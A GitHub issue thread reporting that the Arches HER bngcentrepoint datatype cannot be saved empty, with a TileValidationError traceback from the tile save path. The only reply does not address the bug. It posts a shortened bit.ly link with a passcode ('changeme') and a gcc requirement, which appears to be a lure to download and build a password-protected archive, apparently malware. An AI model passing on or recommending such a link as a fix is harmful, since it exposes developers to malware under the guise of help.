### ISSUE TITLE
bngcentrepoint datatype can't be saved as None

### ISSUE THREAD

**Issue by samuelscandrett** [archesproject/arches-her#1327]
Saving an empty National Grid References card through the UI (or through the ArcGIS Pro plugin 'create resource' feature) will produce the following error:

![image](https://github.com/user-attachments/assets/3a08aead-32e4-48c0-9f15-814a9f9a71ba)

```
2024-09-05 13:49:18,733 arches.app.views.tile ERROR    Unable to save. Please verify your input is valid [Tile id: ]                      [Exception message: TileValidationError: Issue with input data]                      [Exception trace: Traceback (most recent call last):
  File "/home/samuel/arches_dev/arches_her/arches/arches/app/views/tile.py", line 144, in post
    tile.save(request=request, transaction_id=transaction_id)
  File "/home/samuel/arches_dev/arches_her/arches/arches/app/models/tile.py", line 459, in save
    self.validate([], request=request)
  File "/home/samuel/arches_dev/arches_her/arches/arches/app/models/tile.py", line 353, in validate
    raise TileValidationError(_("{0}".format(error_instance["message"])))
arches.app.models.tile.TileValidationError: 'Issue with input data'
]
Internal Server Error: /tile
```

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
